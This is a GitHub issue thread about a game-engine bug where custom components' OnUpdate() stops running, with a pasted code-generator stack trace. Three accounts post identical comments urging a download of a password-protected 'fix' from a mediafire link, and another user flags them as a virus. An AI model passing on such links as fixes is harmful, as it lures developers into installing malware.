### ISSUE TITLE
OnUpdate() stopped working

### ISSUE THREAD

**Issue by GreaterThen0** [Facepunch/sbox-issues#6317]
### Describe the bug

it started with the editor randomly stopped showing a .razor component.

now all my (.cs) custom components OnUpdate() won't run.

I have no errors in the console.

### To Reproduce

im not entirely sure.

### Expected behavior

OnUpdate() to run every frame.

### Additional context

im on Windows 11 with a good computer

the only error I can find is in Visual Studio and I'm not sure if it is related.

Severity	Code	Description	Project	File	Line	Suppression State	Details
Error	SB5000	Code Generator Crashed at System.Threading.Tasks.TaskReplicator.Run[TState](ReplicatableUserAction`1 action, ParallelOptions options, Boolean stopOnFirstFailure)   at System.Threading.Tasks.Parallel.ForWorker[TLocal,TInt](TInt fromInclusive, TInt toExclusive, ParallelOptions parallelOptions, Action`1 body, Action`2 bodyWithState, Func`4 bodyWithLocal, Func`1 localInit, Action`1 localFinally)--- End of stack trace from previous location ---   at System.Threading.Tasks.Parallel.ForWorker[TLocal,TInt](TInt fromInclusive, TInt toExclusive, ParallelOptions parallelOptions, Action`1 body, Action`2 bodyWithState, Func`4 bodyWithLocal, Func`1 localInit, Action`1 localFinally)   at System.Threading.Tasks.Parallel.ForEach[TSource](IEnumerable`1 source, Action`1 body)   at Sandbox.Generator.RazorProcessor.ProcessPages(Processor processor)   at Sandbox.Generator.Processor.Run(CSharpCompilation compilation, CSharpCompilation lastSuccessfulCompilation, ImmutableArray`1 lastBeforeIlHotloadProcessingTrees) - One or more errors occurred. (Nullable object must have a value.)	map_y	C:\Users\haypu\OneDrive\Documents\s&box projects\map_y\Code\map_y.csproj	1	Active

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by badandbest** [comment]
# Oh. That's a virus in s&box-issues

![image](https://github.com/user-attachments/assets/7d0027b0-b249-4376-bfad-4c6e3aa2937a)

**Comment by aylaylay** [comment]
OnUpdate works. Not sure what happened for you
